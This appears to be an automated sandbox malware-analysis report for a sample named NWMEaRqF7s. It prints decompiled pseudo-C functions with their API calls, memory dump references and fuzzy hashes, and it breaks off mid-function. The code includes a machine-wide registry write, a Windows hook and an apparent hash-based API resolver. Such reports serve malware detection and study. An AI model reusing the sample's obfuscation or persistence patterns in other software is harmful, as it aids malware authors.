                                                        • Part of subcall function 00402440: RegCreateKeyExA.KERNELBASE(80000002,004346D4,00000000,00000000,00000000,0002001F,00000000,00000000,?), ref: 00402471
                                                        • Part of subcall function 00402440: RegSetValueExA.KERNELBASE(00000000,00000000,00000000,00000004,?,00000004), ref: 00402492
                                                        • Part of subcall function 00402440: RegCloseKey.KERNELBASE(00000000), ref: 0040249F
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: CloseCreateValue$Query
                                                      • String ID:
                                                      • API String ID: 4008097885-0
                                                      • Opcode ID: 4b525abb1b769d0c291595b1a73f4448208f6ca78324013d7001a83c11f5276b
                                                      • Instruction ID: 165df2290a195cec47e703b39910aa938aa55349580083daa8813ab03a4b17f9
                                                      • Opcode Fuzzy Hash: 4b525abb1b769d0c291595b1a73f4448208f6ca78324013d7001a83c11f5276b
                                                      • Instruction Fuzzy Hash: EF11DAB5A00208FFDB04DF94D959FEEB7B8EB48704F108159FA15AB290D774AA44CFA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E00402440(intOrPtr __ecx, char _a4, char* _a8) {
                                                      				void* _v8;
                                                      				int _v12;
                                                      				long _v16;
                                                      				intOrPtr _v20;
                                                      				long _t14;
                                                      				long _t17;
                                                      				char* _t23;
                                                      
                                                      				_v20 = __ecx;
                                                      				_v8 = 0;
                                                      				_t23 =  *0x442000; // 0x4346d4
                                                      				_t14 = RegCreateKeyExA(0x80000002, _t23, 0, 0, 0, 0x2001f, 0,  &_v8,  &_v12); // executed
                                                      				_v16 = _t14;
                                                      				if(_v16 == 0) {
                                                      					_t17 = RegSetValueExA(_v8, _a8, 0, 4,  &_a4, 4); // executed
                                                      					_v16 = _t17;
                                                      					RegCloseKey(_v8); // executed
                                                      				}
                                                      				return _v16;
                                                      			}










                                                      APIs
                                                      • RegCreateKeyExA.KERNELBASE(80000002,004346D4,00000000,00000000,00000000,0002001F,00000000,00000000,?), ref: 00402471
                                                      • RegSetValueExA.KERNELBASE(00000000,00000000,00000000,00000004,?,00000004), ref: 00402492
                                                      • RegCloseKey.KERNELBASE(00000000), ref: 0040249F
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: CloseCreateValue
                                                      • String ID:
                                                      • API String ID: 1818849710-0
                                                      • Opcode ID: a536cca449fb09f120edcceb967e25cf4e89567f52e613179b64937aa943c92f
                                                      • Instruction ID: 0737cfdb3224fe662ad643e141e09b39c7f81c064591b2ac6240f8f2dc458b35
                                                      • Opcode Fuzzy Hash: a536cca449fb09f120edcceb967e25cf4e89567f52e613179b64937aa943c92f
                                                      • Instruction Fuzzy Hash: 6301BFB9E40208FFE714DF94DD49FAEB778EB48700F108159BB15A7280D6B46A04DBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 91%
                                                      			E0040A2E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                      				void* _t39;
                                                      				intOrPtr _t56;
                                                      				signed int _t58;
                                                      				signed int _t62;
                                                      				intOrPtr _t70;
                                                      				signed int _t76;
                                                      				void* _t78;
                                                      				void* _t82;
                                                      				intOrPtr _t83;
                                                      
                                                      				_t82 = __eflags;
                                                      				_push(0x38);
                                                      				E0041F71D(E004323F0, __ebx, __edi, __esi);
                                                      				_push(0x4037fd);
                                                      				_t56 = E0040F584(__ebx, 0x44642c, __edi, __esi, _t82);
                                                      				_t83 = _t56;
                                                      				 *((intOrPtr*)(_t78 - 0x14)) = _t56;
                                                      				_t84 = _t83 == 0;
                                                      				if(_t83 == 0) {
                                                      					E004037E3(_t56, 0x44642c, __edi, __esi, _t84);
                                                      				}
                                                      				_t4 = _t56 + 0x58; // 0x58
                                                      				_t58 = 7;
                                                      				_t39 = memcpy(_t78 - 0x44, _t4, _t58 << 2);
                                                      				_t70 =  *((intOrPtr*)(_t78 + 0x10));
                                                      				_t76 =  *(_t78 + 8);
                                                      				 *_t39 =  *(_t78 + 0xc);
                                                      				 *((intOrPtr*)(_t56 + 0x60)) =  *((intOrPtr*)(_t78 + 0x14));
                                                      				 *((intOrPtr*)(_t56 + 0x5c)) = _t70;
                                                      				 *((intOrPtr*)(_t56 + 0x64)) =  *((intOrPtr*)(_t78 + 0x18));
                                                      				 *((intOrPtr*)(_t78 - 4)) = 0;
                                                      				if(_t70 == 2 &&  *((intOrPtr*)(_t76 + 0x4c)) != 0) {
                                                      					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t76 + 0x4c)))) + 0x60))(0);
                                                      				}
                                                      				 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
                                                      				if(_t70 == 0x110) {
                                                      					E004089E1(_t76, _t78 - 0x28, _t78 + 8);
                                                      				}
                                                      				 *((intOrPtr*)(_t78 + 0x18)) =  *((intOrPtr*)( *_t76 + 0x108))(_t70,  *((intOrPtr*)(_t78 + 0x14)),  *((intOrPtr*)(_t78 + 0x18)));
                                                      				if(_t70 == 0x110) {
                                                      					E0040A26C(_t56, 0, _t76, _t78 - 0x28,  *(_t78 + 8));
                                                      				}
                                                      				_t30 = _t56 + 0x58; // 0x58
                                                      				_t62 = 7;
                                                      				return E0041F7C2(memcpy(_t30, _t78 - 0x44, _t62 << 2));
                                                      			}












                                                      APIs
                                                      • __EH_prolog3_catch.LIBCMT ref: 0040A2EF
                                                        • Part of subcall function 0040F584: __EH_prolog3.LIBCMT ref: 0040F58B
                                                        • Part of subcall function 004037E3: __CxxThrowException@8.LIBCMT ref: 004037F7
                                                        • Part of subcall function 004037E3: __EH_prolog3.LIBCMT ref: 00403804
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: H_prolog3$Exception@8H_prolog3_catchThrow
                                                      • String ID: ,dD
                                                      • API String ID: 24280941-3191229884
                                                      • Opcode ID: 65ee8d3f11b7dbb7a713a4002fd51a6a596b8f460aab63a27ca7ea3c2e120f50
                                                      • Instruction ID: aadd303bf69657f6d7fcf57e1872b0adf1e10777afe3b3ca5e8b26921ca13ed5
                                                      • Opcode Fuzzy Hash: 65ee8d3f11b7dbb7a713a4002fd51a6a596b8f460aab63a27ca7ea3c2e120f50
                                                      • Instruction Fuzzy Hash: 93214A72A00209DFCF15DF65C4819EE7BA6EF48314F11807AFD05AB281D738EA95CB95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 82%
                                                      			E004011D0(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi) {
                                                      				intOrPtr _v8;
                                                      				char _v16;
                                                      				intOrPtr _v20;
                                                      				char _v336;
                                                      				intOrPtr _v340;
                                                      				intOrPtr _v352;
                                                      				void* __ebp;
                                                      				signed int _t18;
                                                      				intOrPtr _t26;
                                                      				signed int _t42;
                                                      
                                                      				_t39 = __edx;
                                                      				_t18 =  *0x443590; // 0xa920217c
                                                      				 *[fs:0x0] =  &_v16;
                                                      				_v352 = __ecx;
                                                      				__imp__#17(_t18 ^ _t42,  *[fs:0x0], E00431A3B, 0xffffffff);
                                                      				E00404019(_v352);
                                                      				E00407105(__ebx, __edi, 0);
                                                      				E00406622(__ebx, _v352, __edx, __edi, _t42, "Local AppWizard-Generated Applications");
                                                      				E00401450(__ebx,  &_v336, __edi, __esi, _t18 ^ _t42, 0); // executed
                                                      				_v8 = 0;
                                                      				 *((intOrPtr*)(_v352 + 0x20)) =  &_v336;
                                                      				_t26 = E0040638F(__ebx,  &_v336, _t39, __edi, __esi, _t18 ^ _t42); // executed
                                                      				_v20 = _t26;
                                                      				_v340 = 0;
                                                      				_v8 = 0xffffffff;
                                                      				E00401290( &_v336, _t18 ^ _t42);
                                                      				 *[fs:0x0] = _v16;
                                                      				return _v340;
                                                      			}













                                                      APIs
                                                      • #17.COMCTL32(A920217C), ref: 004011FE
                                                        • Part of subcall function 00404019: InterlockedExchange.KERNEL32(00447344,?), ref: 00404045
                                                        • Part of subcall function 00406622: __strdup.LIBCMT ref: 00406631
                                                        • Part of subcall function 00406622: __strdup.LIBCMT ref: 00406644
                                                        • Part of subcall function 0040638F: __EH_prolog3_catch.LIBCMT ref: 00406396
                                                        • Part of subcall function 0040638F: FindResourceA.KERNEL32(?,?,00000005), ref: 004063C9
                                                        • Part of subcall function 0040638F: LoadResource.KERNEL32(?,00000000), ref: 004063D1
                                                        • Part of subcall function 0040638F: LockResource.KERNEL32(?,00000024,00401257,00000000,Local AppWizard-Generated Applications), ref: 004063E2
                                                        • Part of subcall function 00401290: ~_Task_impl.LIBCPMT ref: 004012E4
                                                        • Part of subcall function 00401290: ~_Task_impl.LIBCPMT ref: 004012F3
                                                      Strings
                                                      • Local AppWizard-Generated Applications, xrefs: 00401219
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: Resource$Task_impl__strdup$ExchangeFindH_prolog3_catchInterlockedLoadLock
                                                      • String ID: Local AppWizard-Generated Applications
                                                      • API String ID: 2756291502-3869840320
                                                      • Opcode ID: 4b652bab73451f1050d75de3ea63c1c9252032420ff5dbcae01f9af74fd20209
                                                      • Instruction ID: 0db303b2012f99e3f1afa8417c8b10c21545059f69079e666712292cf1c3cdd3
                                                      • Opcode Fuzzy Hash: 4b652bab73451f1050d75de3ea63c1c9252032420ff5dbcae01f9af74fd20209
                                                      • Instruction Fuzzy Hash: 06114870900618DBCB24EF54DC55BD9B7B4EB49715F1042AAE41A6B3E0DB382A04CF88
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E02253037(long __ecx) {
                                                      				void* _t2;
                                                      				void* _t4;
                                                      				long _t12;
                                                      
                                                      				_t12 = __ecx;
                                                      				_t2 =  *((intOrPtr*)(E02252F84(0xf568ce83, 0x71eb2479, 0x14d)))();
                                                      				E02252F84(0xf568ce83, 0x91b79ad5, 0x51);
                                                      				_t4 = RtlAllocateHeap(_t2, 8, _t12); // executed
                                                      				return _t4;
                                                      			}






                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(00000000,00000008,684DEBFF), ref: 02253067
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.347505404.0000000002251000.00000020.00000001.sdmp, Offset: 02250000, based on PE: true
                                                      • Associated: 00000001.00000002.347493243.0000000002250000.00000004.00000001.sdmp
                                                      • Associated: 00000001.00000002.347513236.0000000002259000.00000004.00000001.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2250000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID: y$q
                                                      • API String ID: 1279760036-2681802098
                                                      • Opcode ID: 4966834b75a3f6c8a8251f9f15d84a0979329aaf495d3badf05bfcb5eb52674e
                                                      • Instruction ID: c235e51f5a747a5278faa710b5053ca36645760c766eaaf8cf6074e2b9fce43d
                                                      • Opcode Fuzzy Hash: 4966834b75a3f6c8a8251f9f15d84a0979329aaf495d3badf05bfcb5eb52674e
                                                      • Instruction Fuzzy Hash: C0D0C7212D533165F42C35F43C05FA60116DF99732F24C1057E385F1D8CEA68C418560
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 64%
                                                      			E0040D3F7(void* __ecx) {
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				void* __ebp;
                                                      				signed int _t28;
                                                      				intOrPtr _t38;
                                                      				intOrPtr _t42;
                                                      				void* _t43;
                                                      				struct HINSTANCE__* _t44;
                                                      				intOrPtr _t45;
                                                      				void* _t47;
                                                      				intOrPtr _t48;
                                                      				signed int _t49;
                                                      				void* _t51;
                                                      
                                                      				_t49 = _t51 - 0x1b0;
                                                      				_t28 =  *0x443590; // 0xa920217c
                                                      				 *(_t49 + 0x1ac) = _t28 ^ _t49;
                                                      				_push(_t43);
                                                      				_t47 = __ecx;
                                                      				E0040D31A(_t28 ^ _t49, _t38, __ecx, _t42, _t43, __ecx);
                                                      				_t44 =  *(__ecx + 8);
                                                      				 *(_t49 + 0x1aa) =  *(_t49 + 0x1aa) & 0x00000000;
                                                      				 *(_t49 + 0x1a8) =  *(_t49 + 0x1a8) & 0x00000000;
                                                      				if(GetModuleFileNameW(_t44, _t49 - 0x60, 0x105) != 0) {
                                                      					if( *(_t49 + 0x1a8) == 0) {
                                                      						 *((intOrPtr*)(_t49 - 0x78)) = _t49 - 0x60;
                                                      						_push(_t49 - 0x80);
                                                      						 *((intOrPtr*)(_t49 - 0x80)) = 0x20;
                                                      						 *((intOrPtr*)(_t49 - 0x7c)) = 0x88;
                                                      						 *((intOrPtr*)(_t49 - 0x6c)) = 2;
                                                      						 *(_t49 - 0x64) = _t44;
                                                      						_t32 = E0040D388(); // executed
                                                      						 *(_t47 + 0x80) = _t32;
                                                      						if(_t32 == 0xffffffff) {
                                                      							_push(_t49 - 0x80);
                                                      							 *((intOrPtr*)(_t49 - 0x6c)) = 3;
                                                      							_t32 = E0040D388(); // executed
                                                      							 *(_t47 + 0x80) = _t32;
                                                      						}
                                                      						if( *(_t47 + 0x80) == 0xffffffff) {
                                                      							_push(_t49 - 0x80);
                                                      							 *((intOrPtr*)(_t49 - 0x6c)) = 1;
                                                      							_t32 = E0040D388(); // executed
                                                      							 *(_t47 + 0x80) = _t32;
                                                      							if(_t32 == 0xffffffff) {
                                                      								 *(_t47 + 0x80) =  *(_t47 + 0x80) & 0x00000000;
                                                      							}
                                                      						}
                                                      					} else {
                                                      						SetLastError(0x6f);
                                                      					}
                                                      				}
                                                      				_pop(_t45);
                                                      				_pop(_t48);
                                                      				return E0041E5DF(_t32, _t38,  *(_t49 + 0x1ac) ^ _t49, _t42, _t45, _t48);
                                                      			}

















                                                      APIs
                                                        • Part of subcall function 0040D31A: GetModuleHandleA.KERNEL32(KERNEL32), ref: 0040D328
                                                      • GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 0040D438
                                                      • SetLastError.KERNEL32(0000006F), ref: 0040D452
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: Module$ErrorFileHandleLastName
                                                      • String ID:
                                                      • API String ID: 613274587-0
                                                      • Opcode ID: 1140d22a4bc11586fb8b33a2693fa1d88d0dedf6a9c8d0f90cf5dd9a28d1640f
                                                      • Instruction ID: 4c084dd07903f31f2770e49e5958585a6a5082f204e8c6cb463d0be25484e369
                                                      • Opcode Fuzzy Hash: 1140d22a4bc11586fb8b33a2693fa1d88d0dedf6a9c8d0f90cf5dd9a28d1640f
                                                      • Instruction Fuzzy Hash: 4C213D71D003088EEB60DFA5D8487EEB7B8BB05318F50463EE869AA1C1DB786549CF55
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E00422C5D(intOrPtr _a4) {
                                                      				void* _t6;
                                                      				intOrPtr _t7;
                                                      				void* _t10;
                                                      
                                                      				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
                                                      				 *0x4468d0 = _t6;
                                                      				if(_t6 != 0) {
                                                      					_t7 = E00422C02(__eflags);
                                                      					__eflags = _t7 - 3;
                                                      					 *0x448500 = _t7;
                                                      					if(_t7 != 3) {
                                                      						L5:
                                                      						__eflags = 1;
                                                      						return 1;
                                                      					} else {
                                                      						_t10 = E00422E5E(0x3f8);
                                                      						__eflags = _t10;
                                                      						if(_t10 != 0) {
                                                      							goto L5;
                                                      						} else {
                                                      							HeapDestroy( *0x4468d0);
                                                      							 *0x4468d0 =  *0x4468d0 & 0x00000000;
                                                      							goto L1;
                                                      						}
                                                      					}
                                                      				} else {
                                                      					L1:
                                                      					return 0;
                                                      				}
                                                      			}







                                                      APIs
                                                      • HeapCreate.KERNELBASE(00000000,00001000,00000000,0041F5BB,00000001), ref: 00422C6E
                                                      • HeapDestroy.KERNEL32 ref: 00422CA4
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: Heap$CreateDestroy
                                                      • String ID:
                                                      • API String ID: 3296620671-0
                                                      • Opcode ID: e3816043460115e40a224fd5a361c21cc7ac43806d8953fad7d81c4a3159e2c6
                                                      • Instruction ID: 50605b1b86adc46f172317f474ea2ef838b38f67434d95992fa8f4b769136fec
                                                      • Opcode Fuzzy Hash: e3816043460115e40a224fd5a361c21cc7ac43806d8953fad7d81c4a3159e2c6
                                                      • Instruction Fuzzy Hash: 9EE06D35715322BAEB047F32BF0576A36E4A742746F41443AF501C50A0FBB88550961E
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E004080C3(intOrPtr* __ecx, int _a4, int _a8, long _a12) {
                                                      				_Unknown_base(*)()* _t11;
                                                      				long _t12;
                                                      				intOrPtr* _t17;
                                                      
                                                      				_t17 = __ecx;
                                                      				_t11 =  *(__ecx + 0x40);
                                                      				if(_t11 != 0) {
                                                      					L3:
                                                      					_t12 = CallWindowProcA(_t11,  *(_t17 + 0x20), _a4, _a8, _a12); // executed
                                                      					return _t12;
                                                      				}
                                                      				_t11 =  *( *((intOrPtr*)( *__ecx + 0xf0))());
                                                      				if(_t11 != 0) {
                                                      					goto L3;
                                                      				}
                                                      				return DefWindowProcA( *(__ecx + 0x20), _a4, _a8, _a12);
                                                      			}







                                                      APIs
                                                      • DefWindowProcA.USER32(?,?,?,?), ref: 004080EA
                                                      • CallWindowProcA.USER32 ref: 004080FF
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: ProcWindow$Call
                                                      • String ID:
                                                      • API String ID: 2316559721-0
                                                      • Opcode ID: ded2b2c8f4ccecfeb941fad25af2ba88284cf4473edce49357e56aebb3a01b73
                                                      • Instruction ID: faabefe62c7c53f3fdcbf67010fdb8b980cc00f1b023ec64b7b1c68eccc98f5b
                                                      • Opcode Fuzzy Hash: ded2b2c8f4ccecfeb941fad25af2ba88284cf4473edce49357e56aebb3a01b73
                                                      • Instruction Fuzzy Hash: 84F0AC36100215EFCF119F94DC04DDA7BB9FF19350B058429FA85D6561EB72E820AF54
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E004099F5(void* __ecx) {
                                                      				struct HINSTANCE__* _t11;
                                                      				signed int _t12;
                                                      				void* _t15;
                                                      
                                                      				_t15 = __ecx;
                                                      				if( *((intOrPtr*)(__ecx + 4)) == 0) {
                                                      					_t11 = GetModuleHandleA( *(__ecx + 0xc)); // executed
                                                      					 *(_t15 + 4) = _t11;
                                                      					if(_t11 == 0) {
                                                      						_t12 = LoadLibraryA( *(_t15 + 0xc));
                                                      						 *(_t15 + 4) = _t12;
                                                      						 *((char*)(_t15 + 8)) = _t12 & 0xffffff00 | _t12 != 0x00000000;
                                                      					}
                                                      				}
                                                      				return  *(_t15 + 4);
                                                      			}







                                                      APIs
                                                      • GetModuleHandleA.KERNELBASE(?,?,00409AD8,InitCommonControlsEx,00000000,0040A1DC,00040000,00008000,?,?,0040C810,00401257,00040000,00000000,?), ref: 00409A01
                                                      • LoadLibraryA.KERNEL32(?,?,00409AD8,InitCommonControlsEx,00000000,0040A1DC,00040000,00008000,?,?,0040C810,00401257,00040000,00000000,?), ref: 00409A11
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: HandleLibraryLoadModule
                                                      • String ID:
                                                      • API String ID: 4133054770-0
                                                      • Opcode ID: 99fdbea0dc4889e037225810345119da6f3f7b98ba3af548d8b61604cfbc3950
                                                      • Instruction ID: 9317f629b01d5a5b7a74bb67438dee8f2f814220c5d55638b190b1096b737129
                                                      • Opcode Fuzzy Hash: 99fdbea0dc4889e037225810345119da6f3f7b98ba3af548d8b61604cfbc3950
                                                      • Instruction Fuzzy Hash: 80E0BF31612750CFC7248F29E9047877BE4EF14710711C47EE4AAD2A61E734EC40CB04
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 86%
                                                      			E004051C9(void* __esi, void* __eflags) {
                                                      				void* _t3;
                                                      				void* _t4;
                                                      				struct HHOOK__* _t6;
                                                      				void* _t7;
                                                      				void* _t8;
                                                      
                                                      				_t3 = E0040DB94(_t7, _t8, __esi, __eflags);
                                                      				_t13 =  *((char*)(_t3 + 0x14));
                                                      				if( *((char*)(_t3 + 0x14)) == 0) {
                                                      					_push(__esi);
                                                      					_t4 = E0040D673(_t7, _t8, __esi, _t13);
                                                      					_t6 = SetWindowsHookExA(0xffffffff, E00405035, 0, GetCurrentThreadId()); // executed
                                                      					 *(_t4 + 0x2c) = _t6;
                                                      					return _t6;
                                                      				}
                                                      				return _t3;
                                                      			}









                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: CurrentHookThreadWindows
                                                      • String ID:
                                                      • API String ID: 1904029216-0
                                                      • Opcode ID: 2badf78d1823c855d47da0a188e546955e8ac16bfe00ce0fae403d97928034df
                                                      • Instruction ID: d2475072599357dfe44180b5e05b1154fe7956b612fa810acb3a96ea88ad64ab
                                                      • Opcode Fuzzy Hash: 2badf78d1823c855d47da0a188e546955e8ac16bfe00ce0fae403d97928034df
                                                      • Instruction Fuzzy Hash: C7D0A771C046502EDB202FB07C0DB8B3B548B04370F1207B6F420761E1C97CA4854F9D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			_entry_() {
                                                      
                                                      				E022547EB();
                                                      				E02252F84(0xf568ce83, 0x87b42d4d, 0x1dc);
                                                      				ExitProcess(0);
                                                      			}



                                                      0x022541df
                                                      0x022541f5
                                                      0x022541fb

                                                      APIs
                                                      • ExitProcess.KERNEL32(00000000), ref: 022541FB
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.347505404.0000000002251000.00000020.00000001.sdmp, Offset: 02250000, based on PE: true
                                                      • Associated: 00000001.00000002.347493243.0000000002250000.00000004.00000001.sdmp
                                                      • Associated: 00000001.00000002.347513236.0000000002259000.00000004.00000001.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2250000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: ExitProcess
                                                      • String ID:
                                                      • API String ID: 621844428-0
                                                      • Opcode ID: 4e1fa8e6cbb4071dcb0aa49f4f876a2119f30f344a9f7933f784ea78dc4d0f45
                                                      • Instruction ID: a99fad7a1b3e0ff3354db0af46632687ecf4f3a1b316908e21b941e19447d05e
                                                      • Opcode Fuzzy Hash: 4e1fa8e6cbb4071dcb0aa49f4f876a2119f30f344a9f7933f784ea78dc4d0f45
                                                      • Instruction Fuzzy Hash: CBB092222D0326B6F41875F01C19F8A50138BA6712F20CA062A226E1C88FA19592E524
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.347463465.0000000002241000.00000020.00000001.sdmp, Offset: 02241000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2241000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 828b724592dbaa7f77a73f4835806f92a6371d7ccbb1b7ddea64374e2172481f
                                                      • Instruction ID: d05c7bc32b1cebbee5e8a026d02848c6da3ecf7d3fdc1457ad487c81d5927418
                                                      • Opcode Fuzzy Hash: 828b724592dbaa7f77a73f4835806f92a6371d7ccbb1b7ddea64374e2172481f
                                                      • Instruction Fuzzy Hash: DD41BA78A10109EFDB08CF84C494BAAB7B2FF88314F24C159E9195F359C775EA92CB80
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 19%
                                                      			E02255AA1() {
                                                      				char _v524;
                                                      				intOrPtr _v548;
                                                      				char _v564;
                                                      				intOrPtr _v568;
                                                      				void* _v572;
                                                      				void* _t14;
                                                      				intOrPtr* _t17;
                                                      				void* _t19;
                                                      				intOrPtr* _t24;
                                                      				void* _t26;
                                                      				void* _t30;
                                                      				void* _t37;
                                                      				void* _t39;
